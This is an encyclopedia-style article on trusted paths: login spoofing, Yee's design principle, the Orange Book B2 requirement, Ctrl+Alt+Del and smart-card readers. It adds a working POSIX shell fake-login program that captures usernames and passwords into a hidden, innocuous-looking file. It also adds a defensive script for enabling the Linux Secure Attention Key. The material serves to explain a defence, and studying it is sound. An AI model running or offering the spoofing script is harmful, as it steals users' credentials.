Trusted path

A trusted path is a mechanism that gives the user confidence that they are communicating with the program or system they intended to communicate with, and that an attacker cannot intercept or modify whatever is being exchanged over it.

It is the user-facing counterpart of a trustworthy channel: where a trustworthy channel protects data in transit between two components, a trusted path assures the user that the program or system on the other end really is the one they intended to use.

The traditional example is a 'fake login' program: a program written to look exactly like the system's login screen (see Login spoofing). When a user tries to log in, the fake login program records the user name and password for later use, typically prints the system's genuine 'login incorrect' message and exits, so that the real login prompt reappears and the user assumes they simply mistyped their password.
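The attack described above, as an added example that is not part of the original page: a POSIX shell script that imitates a console login. An attacker who is logged in on a shared terminal runs it with `exec`, so that when it exits the attacker's shell is gone and getty redraws the genuine prompt. The banner text, the drop file path and the environment variable names are assumptions for illustration.

```shell
#!/bin/sh
# Constructed example of the classic "fake login" program (added here,
# not code from the page). Run as `exec ./fakelogin.sh` on a console and
# walk away; the next user sees what looks like the system login prompt.

BANNER='Debian GNU/Linux 12 lab1 tty1'     # assumed: copies the real getty banner
LOG="${FAKELOGIN_LOG:-/tmp/.fonts.cache}"  # assumed: innocuous-looking drop file
DELAY="${FAKELOGIN_DELAY:-2}"              # the real login pauses before failing

spoof_login() {
    # Reproduce the real prompts byte for byte: nothing on the screen
    # tells the victim whether this text comes from login(1) or from us.
    printf '%s\n\n' "$BANNER"
    printf 'login: '
    read -r user || return 1
    printf 'Password: '
    stty -echo 2>/dev/null || :      # hide the typing, as login(1) does
    read -r password || return 1
    stty echo 2>/dev/null || :
    printf '\n'
    # The capture goes to $LOG; the victim only ever sees "Login incorrect".
    printf '%s:%s\n' "$user" "$password" >> "$LOG"
    sleep "$DELAY"
    printf 'Login incorrect\n'
}

# Interactive use (FAKELOGIN_RUN=1): capture once, then exit so that the
# real login program reappears and the victim simply tries again.
if [ "${FAKELOGIN_RUN:-0}" = "1" ]; then
    spoof_login
fi
```

Nothing in the victim's view of the screen distinguishes this program from the real one; only a channel the attacker's process cannot intercept, such as a secure attention key that kills every process on the console before showing the real prompt, defeats it.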

According to Yee, Ka-Ping, "User Interaction Design for Secure Systems" (http://people.ischool.berkeley.edu/~ping/sid/uidss.pdf):

Principle of the Trusted Path. The most important input and output channels are those used to manipulate authorities; if these channels can be spoofed or corrupted, the system has a security vulnerability. Hence the principle of the trusted path: the user must have an unspoofable and incorruptible channel to any entity trusted to manipulate authorities on the user's behalf. The authority-manipulating entity could be a number of different things, depending on the domain. In an operating system, the authority-manipulating entities would be the operating system and user interface components for handling authorities. Microsoft Windows, for example, provides a trusted path to its login window by requiring the user to press Ctrl+Alt+Del. This key sequence causes a non-maskable interrupt that can only be intercepted by the operating system, thus guaranteeing that the login window cannot be spoofed by any application. This issue also needs to be addressed in any language system for running untrusted code, such as Java.

Examples of Problems of Untrusted Paths

History

An early reference to a trusted path is in the Orange Book (the US Department of Defense Trusted Computer System Evaluation Criteria), where it first appears as a requirement for evaluation class B2:

3.2.2.1.1 Trusted Path
The TCB shall support a trusted communication path between itself and user for initial login and authentication. Communications via this path shall be initiated exclusively by a user.

Solutions

There have been different approaches to building trusted paths. Some are implemented purely in software, so the user has to trust that the software is correct and has not been tampered with. The familiar Windows Ctrl+Alt+Del sequence is of this kind: the key combination is reserved by the operating system's keyboard handling, so no ordinary application can receive or suppress it, but the keyboard hardware gives the user no independent indication that the genuine secure login screen is the one being displayed; if the operating system itself has been subverted, the sequence proves nothing.

Some smart card readers have their own keypad (and sometimes a display), so the PIN is typed on the reader and sent directly to the card; it never passes through the untrustworthy PC keyboard or through software on the host that could be logging keystrokes.
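The Linux counterpart of the software-only Ctrl+Alt+Del approach is the kernel's Secure Attention Key (SAK), which kills every process attached to the console, including any fake login program, before getty redraws the genuine prompt. The following POSIX shell script, added here and not taken from the page or from the kernel's documentation, checks whether the kernel's `kernel.sysrq` setting permits SAK and shows how to enable it and bind it to a key; the bitmask values and the `loadkeys` line follow the kernel's `sysrq` and `SAK` documentation, and the `SYSRQ_FILE` override and key code are assumptions for illustration.

```shell
#!/bin/sh
# Added example (not from the page): inspect and enable the Linux Secure
# Attention Key. SAK is implemented purely in software, in the kernel's
# tty layer, so the user still has to trust that the kernel is intact.

SYSRQ_FILE="${SYSRQ_FILE:-/proc/sys/kernel/sysrq}"   # assumed override for testing

# kernel.sysrq is a bitmask: 1 enables every SysRq function, 0 disables
# all of them, and bit 4 is "enable control of keyboard (SAK, unraw)".
sak_allowed_by_mask() {
    mask=$1
    [ "$mask" -eq 1 ] && return 0
    [ $(( mask & 4 )) -ne 0 ]
}

# Read the live setting and report whether SAK will work; exit status
# 0 = enabled, 1 = disabled, 2 = could not read the setting.
sak_status() {
    if [ ! -r "$SYSRQ_FILE" ]; then
        echo "cannot read $SYSRQ_FILE"
        return 2
    fi
    mask=$(cat "$SYSRQ_FILE")
    if sak_allowed_by_mask "$mask"; then
        echo "SAK enabled (kernel.sysrq=$mask)"
    else
        echo "SAK disabled (kernel.sysrq=$mask)"
        return 1
    fi
}

# Enable the keyboard-control SysRq group and bind SAK to Ctrl+Alt+Pause
# (keycode 101 on a PC keyboard) on the text console. Needs root and a
# real console; Alt+SysRq+K also triggers SAK once the group is enabled.
enable_sak() {
    sysctl -w kernel.sysrq=4 || return 1
    echo 'control alt keycode 101 = SAK' | loadkeys
}
```

The point of checking the bitmask first is that many distributions ship `kernel.sysrq` with a restricted value (for example one that only allows sync and reboot), in which case pressing the SAK combination silently does nothing and the console offers no trusted path at all. Note also that SAK kills everything holding the console open, including an X server or gpm if they are running on that virtual terminal, which is exactly the behaviour that removes a fake login program.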